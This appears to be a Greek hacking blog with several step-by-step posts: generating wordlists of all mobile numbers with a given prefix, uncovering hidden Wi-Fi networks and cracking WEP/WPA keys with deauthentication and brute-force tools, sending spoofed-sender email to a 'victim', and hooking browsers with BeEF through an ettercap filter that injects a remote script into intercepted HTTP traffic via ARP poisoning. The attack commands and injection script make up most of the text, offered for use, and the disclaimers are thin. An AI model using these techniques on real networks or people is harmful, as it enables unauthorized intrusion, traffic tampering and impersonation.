- -t την βαση που δεν θα αλλαζει και %% θα βαζει αριθμους αν @@ θα βαζει γραμματα αν ^^ θα βαζει ειδικους χαρακτηρες χαρακτηρες
- -ο που θα αποθηκευτει
- ./crunch 10 10 -f charset.lst numeric -t 694%%%%%%% -o /root/kinhta.txt
- θα δημιουργησετε μια λιστα απο ολα τα κινητα 694 απο 6940000000-6949999999 η οποια θα ειναι 104.9 mb
- *επιπλεον επιλογες
- -b χωριζετε σε μεγεθος δλδ αν ειναι 100mb μπορειτε να την χωρισετε σε 50mb 2 αρχεια πχ -b KB / MB / GB (πρεπει να το χρησιμοποιησετε με -o START *START ειναι το προσωρινο αρχειο που αποθηκευετε η λιστα θα την βρειτε /pentest/passwords/crunch
- -c χωριζετε σε γραμμες αντι για μεγεθος 100000 ειναι περιπου 1mb (-o START)
- -e ποτε θα σταματισει πχ αν θελω να δημιουργησω απο το 00000-99999 μπορω να το σταματησω στο 33333
- -r συνεχιζω την λιστα αν την εχω σταματησει
- -s βαζω την λιστα μου να αρχισει απο καπου πχ ./crunch 4 4 123456789 -s 4444 θα αρχισει απο 4444 και η λιστα θα ειναι 4444-9999
- -z συμπιεζω την λιστα -z gzip, bzip , lzma
Ετικέτες
File Crack,
Router hack,
WEP/WPA/WPA2 Crack
Δευτέρα 9 Ιανουαρίου 2012
Πως βρισκω και σπαω ενα κρυφο ασυρματο δικτυο
Με αυτο τον οδηγο θα μπορειτε να βρειτε το ονομα απο ενα κρυφο ασυρματο δικτυο και τον κωδικο(δεν ευθυνομαι για κακοβουλη χρηση του σε ξενα δικτυα καθως ειναι παρανομο να μοιραζεσαι το δικτυο χωρις την συγκαταθεση του ιδιοκτητη)
Τι θα χρειαστειτε;
1.Backtrack 5 R1
- Υπαρχουνε 2 τροποι
- με το aireplay-ng και με το mdk3
Aireplay-ng (αν υπαρχει καποιος ηδη συνδεδεμενος)
- οταν το ψαξουμε με το wicd network manager θα μας το εμφανισει ετσι
- ανοιγουμε ενα τερματικο και γραφουμε
- airmon-ng start wlan0
- airodump-ng mon0 και οταν δουμε με ονομα <length: 6>δλδ εμενα το ονομα ειναι 6 γραμματα αν λεει <lenght 3> ειναι 3 κτλ.
- airodump-ng -w kryfo --bssid 00:1F:9F:8E:53:9B -c 1 mon0
- οπου
- -w το ονομα που θα αποθηκευοντε οι πληροφοριες
- --bssid η mac address του ασυρματου δικτυου
- -c το καναλι που εκπεμπει το δικτυο
- βαλαμε το airodump-ng να ακουει συγκεκριμενα σε αυτο το δικτυο
- αν δουμε καποιον station συνδεδεμενο τοτε γραφουμε
- aireplay-ng -0 4 -a 00:1F:9F:8E:53:9B -c 00:34:45:45:45:34 mon0
- οπου
- -0 deauthentication ποσες φορες θα κανουμε
- -a η mac address του δικτυου
- -c η mac address του χρηστη(station)
- οταν πιασουμε το handshake θα μας εμφανισει και το ονομα του δικτυου
- οποτε μετα μπορουμε να συνεχισουμε το σπασιμο του δικτυου
- για wpa απλα εφοσον εχουμε πιασει το handshake απλα γραφουμε την εντολη aircrack-ng /root/kryfo*.cap -w /root/lexika/lexiko.txt
- οπου
- -w στο φακελο οπου εχετε το λεξικο σας
Mdk3
- γραφουμε σε ενα τερματικο airmon-ng start wlan0 *αν δεν το εχουμε ξεκινησει απο πριν
- airodump-ng mon0 ωστε να δουμε το bssid και το καναλι του δικτυου μετα το σταματαμε με ctrl+c και παλι airodump-ng -w * --bssid * -c * mon0
- και ανοιγουμε ενα αλλο τερματικο και γραφουμε
- mdk3 mon0 p -b a -c 1 -t 00:1F:9F:8E:53:9B -s 1000
- οπου p -b ειναι το σπασιμο με brutalforce για το δικτυο
- -c το καναλι
- -b a για ολους τους χαρακτηρες
- -b u για κεφαλαια γραμματα
- -b l για μικρα γραμματα
- -b n για αριθμους
- -t η mac address του δικτυου
- -s ποσα πακετα θα στελνουμε (καλυτερα μην χρησιμοποιησετε αυτη την επιλογη γιατι σε ορισμενες καρτες δεν δουλευει)
- * -f αν θελετε να κοιταει σε αρχειο.txt για τα ονοματα
- θα σας δειξει και αλλα δικτυα που ειναι στο καναλλι απλα αφηστε το μεχρι να τελειωσει και θα σας εμφανισει το ονομα οπως εδω
- για wep εχουμε ξεκινησει το airodump-ng στο συγκεκριμενο δικτυο οπως πανω γραφουμε σε ενα τερματικο aireplay-ng -1 0 -a bssid mon0
- μετα aireplay-ng -3 -b bssid mon0
- *(bssid = mac address του δικτυου)
- οταν φτασουν τα πακετα πανω απο 5000
- ανοιγω ενα αλλο τερματικο και γραφω
- aircrack-ng /root/kryfo*.cap
παταω Network -find a hidden network γραφω το ονομα βαζω και τον κωδικο στο properties και τελος
Πως θα προστατευτειτε;
1.Να εχετε wpa2 κρυπτογραφηση στο δικτυο σας με δυσκολο κωδικο και αν θελετε μπορειτε να κρυψετε το δικτυο σας ανουσιο βεβαια αλλα θα δυσκολεψει αρκετα τον αλλον ωστε να βρει ονομα και κωδικο....
2.Καντε ενσυρματη την συνδεση σας στο διαδικτυο
Ετικέτες
WEP/WPA/WPA2 Crack
Κυριακή 8 Ιανουαρίου 2012
Πως εντοπιζω ενα email
Με αυτο τον οδηγο θα σας δειξω πως να εντοπισετε τα ιχνη της φυσικης διευθυνσης απο οπου σταλθηκε το email.
Τι θα χρειαστειτε;
1.Firefox ή IE
- πηγαινουμε στο email μας πχ για hotmail παταω δεξι κλικ στο μηνυμα που θελω να εντοπισω και παταω εκει που λεει προβολη προελευσης μηνυματος
- θα σας ανοιξει μια καινουργια καρτελα οπως εδω
- και βλεπετε προσεχτικα την ip sender
- μετα πηγαινετε στο http://www.ip-adress.com/ip_tracer/ και γραψτε την ip πχ εγω πηρα ενα μηνυμα της Groupon και ανακαλυψα οτι το μηνυμα σταλθηκε απο Γερμανια.το οποιο μας λεει οτι η Groupon ειναι Γερμανικη εταιρεια και η Ελληνικη ειναι franchise.
Απλα να ξερετε οτι το email το εντοπιζετε μεχρι την ISP υπηρεσια τουκαι οχι στο σπιτι του αποστολεα και για να το εντοπισετε ακριβως πρεπει να επικοινωνησετε με την υπηρεσια πχ για Ελλαδα Forthnet ,ΟΤΕ,Ηol κλπ και μονο αυτες μπορουνε να σας δωσουνε την ακριβη τοποθεσια εφοσον υπαρχει λογος σοβαρος(συνηθως οταν υπαρχει ποινικη διωξη)
Ετικέτες
Tips and Tricks
Σάββατο 7 Ιανουαρίου 2012
SendEmail καντε πλακα στους φιλους και γνωστους σας
Με αυτο τον οδηγο θα σας δειξω πως μπορειτε να στειλετε email και να βαλετε οτι email θελετε για αποστολεα
* ο οδηγος εχει ανανεωθει 13.01.2015*
*Για Kali linux
leafpad /usr/share/perl5/IO/Socket/SSL.pm
και αλλαζουμε την γραμμη
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?)&}i με
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?))}i
αποθηκευουμε
η εντολη για να στειλουμε ειναι
sendemail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m Jenna is looking for Greek Star are you interesting? -s smtp.gmail.com:587 -xu ********@gmail.com -xp ******* -o tls=yes
* ο οδηγος εχει ανανεωθει 13.01.2015*
Τι θα χρειαστειτε;
1.Backtack 5 R1 / Kali Linux
leafpad /usr/share/perl5/IO/Socket/SSL.pm
και αλλαζουμε την γραμμη
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?)&}i με
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?))}i
αποθηκευουμε
η εντολη για να στειλουμε ειναι
sendemail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m Jenna is looking for Greek Star are you interesting? -s smtp.gmail.com:587 -xu ********@gmail.com -xp ******* -o tls=yes
- ανοιγω ενα τερματικο και γραφω
- sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m Jenna is looking for Greek Star are you interesting? -s smtp.googlemail.com -xu *******@gmail.com -xp ************
- οπου
- -f το email του αποστολεα
- -t το email του θυματος
- -u την επικεφαλιδα του μηνυματος
- -m το μηνυμα
- -s την υπηρεσια smtp για gmail ειναι αυτη που βλεπετε πανω
- -xu το gmail σας (καλυτερα να φτιαξετε ενα τυχαιο)
- -xp ο κωδικος του gmail σας
- αν θελετε μπορειτε να μην βαλετε την επιλογη -m και θα γραψετε μετα το μηνυμα απλα πρεπει να γραψετε μεσα σε ενα λεπτο την πρωτη γραμμη και μετα οταν γραψετε το υπολοιπο μερος του πατηστε ctrl+d και θα αποσταλθει
- επισεις αν θελετε να στειλετε συννημενο το στελνετε με την επιλογη -a και ακολουθει η διευθυνση του αρχειου που θελετε να στειλετε πχ sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -a /root/arxeio -u Hello Greek Tsolia -m Jenna is looking for Greek Tsolia Are you interesting? -s smtp.googlemail.com -xu **********@gmail -xp ***********
- και στο θυμα θα του εμφανιστει αυτο
- http://www.sendanonymousemail.net/ και http://emkei.cz/ εδω μπορειτε να στειλετε μεσω του browser σας αν εχετε αλλο λειτουργικο πχ windows,mac κτλ.
Ετικέτες
Tips and Tricks
Τετάρτη 4 Ιανουαρίου 2012
Browser explotation framework (BeEF)Πως εισβαλετε σε υπολογιστη μεσω του browser του
Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο
Τι θα χρειαστειτε;
1.Backtrack 5 R1
2.Cross-Site-Sctript (xss)
- πριν αρχισουμε παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα
- #Nickthesail0r
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "</head>")) {
replace("</head>", "</head><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
msg("EPIASES_LAYRAKI\n");
}
if (search(DATA.data, "</HEAD>")) {
replace("</HEAD>", "</HEAD><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
msg("epiases_layraki\n");
}
} - πρεπει να βαλεις την δικια σου ip στο http://192.168.1.66
- μετα παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef
- παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)
- αλλαξε το http://127.0.0.1/beef με την δικια σου ip πχ http://192.168.1.66/beef ,πατα apply config και finished
- τωρα για να δειτε τι κανει το beEF ακριβως μπορεις να το δοκιμασεις σε εσενα αν πας στο view spawn zombie example
και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα
- και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss
- Υπαρχουνε παρα πολλες επιλογες οπως να εισβαλετε στον υπολογιστη του να τον ανακατευθυνετε σε αλλη σελιδα κτλ
- τωρα πως κανουμε το θυμα να ενωθει μαζι μας;
- ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο και γραφουμε
- etterfilter /root/Desktop/xssbeef -ο xssbeef.ef
- μας εμφανιζει αυτο
- etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file '/root/Desktop/xssbeef' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'filter.ef' done.
-> Script encoded into 20 instructions. - μετα γραφουμε στο τερματικο ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift+u επιλεγουμε wlan0 μετα ctrl+s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl+f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα
- τελος παταμε ctrl+w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες) * αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας ettercap -T -M arp // // -F '/root/xssbeef.ef' -i wlan0
Ετικέτες
Attack and Exploit
Εγγραφή σε:
Αναρτήσεις (Atom)